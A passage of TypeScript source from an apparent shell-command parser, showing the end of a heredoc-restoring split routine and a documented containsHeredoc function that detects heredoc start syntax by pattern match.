    restoreHeredocsInString(segment, heredocs)

  return heredocs.size > 0 ? parts.map(segment => expand(segment)) : parts
}
721  
/**
 * Reports whether a command looks like it uses heredoc syntax.
 *
 * Only the heredoc start pattern is searched for; nothing checks that the
 * heredoc is well-formed (for example, that a closing delimiter exists).
 *
 * @param command - The shell command string
 * @returns true if the command appears to contain heredoc syntax
 */
export function containsHeredoc(command: string): boolean {
  const firstHit = HEREDOC_START_PATTERN.exec(command)
  return firstHit !== null
}